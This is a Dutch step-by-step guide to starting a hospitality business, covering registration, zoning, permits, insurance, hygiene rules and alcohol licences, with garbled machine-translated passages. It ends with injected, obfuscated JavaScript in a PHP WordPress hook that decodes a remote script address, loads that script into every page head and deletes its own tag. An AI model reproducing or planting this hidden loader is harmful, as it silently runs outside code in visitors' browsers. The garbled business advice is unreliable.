Het allesomvattende horeca stappenplan

1. Kamer van Koophandel en Belastingdienst

Iedereen die een bedrijf opricht (horecadienst) moet zich inschrijven in het Handelsregister van de Kamer van Koophandel (KK). Dit moet gebeuren binnen een week na de start van het bedrijf. Het inschrijfgeld bedraagt € 51,30. Na inschrijving geeft de KvK uw gegevens automatisch door aan de Belastingdienst. Dan hoeft u zich niet apart in te schrijven bij de Belastingdienst. Op dit moment is het handig om na te denken over hoe u uw betalingen gaat regelen. Hiervoor heeft u een geschikt zakelijk account nodig.

2. Eigen bedrijf?

Controleer het bestemmingsplan van uw gemeente. Stel dat u dit heeft gevonden na het schrijven van uw ondernemingsplan. Dan kom je in de verleiding om in de auto te springen en direct een lease- of koopovereenkomst te tekenen. Neem even de tijd om over dit onderwerp te lezen. Hoofdstuk Haasten is zelden goed! Het is erg belangrijk dat u eerst naar de gemeente gaat om de planning te controleren. Significante veranderingen op korte (of lange termijn) van de voorgestelde locatie (of zijn omgeving). Deze ideale ligging is dus niet zo ideaal als je in eerste instantie dacht. Aan de slag ondanks bestemmingsplan Uw toekomstige horecazaak volgt geen bestemmingsplan, maar u wilt zich toch in de buurt vestigen? Controleer of het bestemmingsplan kan worden gewijzigd of een omgevingsvergunning wordt verkregen voor "activiteit die volgens de wet in strijd is met het bestemmingsplan".

3. Maak planning mogelijk

Denk niet alleen na over wat u nu nodig heeft. Misschien wilt u het in de toekomst uitbreiden. Is dit mogelijk op de site die u noemde? U kunt natuurlijk altijd verhuizen, maar dat kan desastreus zijn voor uw opgebouwde klantenbestand. Herontwikkeling of renovatie? Als u verbouwingen of renovaties uitvoert, hebt u vaak een milieuvergunning van uw plaatselijke overheid nodig. Mogelijk moet u ook een omgevingsvergunning aanvragen voor sloopwerkzaamheden en werkzaamheden die de monumenten betreffen. Brandwerende bouwvergunningen Wist u dat voor bepaalde gebouwen een omgevingsvergunning vereist is voor het gebruik van brandwerende gebouwen? Dit is bijvoorbeeld het geval bij basisscholen en hotels. Gebruiksverklaring Voor gebruik van andere gebouwen is meestal een gebruikersverklaring vereist. U kunt online bij de Omgevingsdienst navragen welk scenario van toepassing is op uw toekomstige horecabedrijf. Denk ook aan de toekomst. U wilt misschien beginnen met een kopje koffie, maar daarna kunt u ook lunchen. Voor toekomstige projecten is het de moeite waard om toestemming te vragen. Image

4. Bedrijfsverzekeringen horeca

Horecabedrijven lopen allerlei risico's: van diefstal tot inbraak of brand in de keuken. Tegen deze risico's kunt u zich onder andere verzekeren met de volgende polissen: Aansprakelijkheidsverzekering Inventarisverzekering Facilitair en rechtbankenverzekering Uw handelswoning Rechtsbijstandverzekering Arbeidsongeschiktheidsverzekering In dit artikel over de belangrijkste verzekeringen voor startende ondernemers, we zetten alle risico's en hun oplossingen op een rij. Hier vindt u alle specifieke informatie per type verzekering.

5. Milieubeheer

Als u een eigen horecabedrijf start, moet u voldoen aan de milieuregels op het gebied van bijvoorbeeld geluid, energie en afval. Voor het aanleggen of wijzigen van een milieuvoorziening is echter in de meeste gevallen geen bijzondere omgevingsvergunning nodig, maar is melding voldoende. Neem contact op met uw plaatselijke gemeente voor informatie.

6. Exploitatievergunning

Ondernemers die een restaurant of café beginnen, of willen overnemen, moeten in sommige gemeenten een speciale exploitatievergunning voor hotels en restaurants aanvragen. Deze voorwaarden hebben betrekking op de openbare orde, de veiligheid en de goede zeden in de omgeving van openbare inrichtingen. Algemene plaatselijke verordening (APV) (algemene gemeentewet) Specifieke informatie is te vinden in de algemene gemeentelijke verordening (APV) van uw gemeente. In alle gevallen moeten bedrijfsleiders deze verordening naleven.

7. Van Hygiëne naar NVWA

Of je nu een restaurant begint, een sapbar opent of met een foodtruck reist: in de horeca is hygiëne natuurlijk erg belangrijk. Wanneer u uw eigen restaurantbedrijf start, moet u dit zeer serieus nemen. HACCP-plan Als horecaondernemer moet u dus een HACCP-plan hebben of kunnen aantonen dat het voldoet aan een erkende hygiënecode. Deze is te bestellen op de website van de KHN. Er gelden immers strikte regels voor de bereiding van eten en drinken waaraan u als horecaprofessional zich moet houden. Ga je binnenkort voedsel produceren of verwerken, bijvoorbeeld in een restaurant? Dan moet u zich ook inschrijven in het register van de Nederlandse Voedsel- en Warenautoriteit (NVWA).

8. Drank- en restaurantvergunningen

Weet ook: het schenken van alcohol is op deze manier niet toegestaan. Als u alcoholische dranken wilt schenken in uw horecabedrijf, moet u een stadsdrank- en horecavergunning hebben. Daarnaast moeten uw pand en medewerkers ook aan andere eisen voldoen. Let hier goed op bij het opleiden van nieuwe medewerkers, want hoge boetes wil je immers niet. Leer meer over de Alcoholwet!

9. Particulier horecabedrijf: organiseer je terras Licentie

Als je de ruimte hebt is het natuurlijk een groot pluspunt als klanten bij mooi weer ook buiten kunnen zitten, je kunt binnenkomen Drinken of dineren op het terras. Maar als u een terras op uw terrein (of in een openbare ruimte) wilt plaatsen, heeft u in veel gevallen eerst een terrasvergunning nodig van uw gemeente. Let op: Binnenplaatsen zijn alleen toegestaan in gevestigde horecazaken.

10. Professionele aanwezigheid en muziekrechten

Heeft uw bedrijf in de toekomst ook een gokautomaat? Vraag op tijd een vergunning aan bij de gemeente. Deze vergunning is dan geldig voor een locatie of voorziening. Vergeet ook de muziekrechten niet, want ook bij het spelen van muziek in het openbaar heb je te maken met overheidsregels.

11. Organiseer uw betalingsverkeer

Tijdens de ontdekkingsfase moet u ook nadenken over hoe u uw handelsbetalingen precies wilt organiseren. Dit omvat meestal het openen van een zakelijke rekening. Administratie En gaat u de boekhouding zelf doen of wilt u dit werk uitbesteden? Natuurlijk, als je groter gaat worden, laat dat dan over aan je accountant of boekhouder. Hoe groter uw bedrijf, hoe ingewikkelder het is om te beheren.

12. Risico-inventarisatie en evaluatie

De kans is groot dat u binnenkort ook personeel kunt aannemen voor uw horecazaak. Om dit te kunnen doen, moet je bij de start van jouw onderneming beschikken over een zekere risicoinventarisatie en evaluatie (RIandE). Hierin komen onder meer de huidige bedrijfsrisico's op de werkplek (en hoe je deze risico's in de toekomst zoveel mogelijk gaat beperken) aan bod.

0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>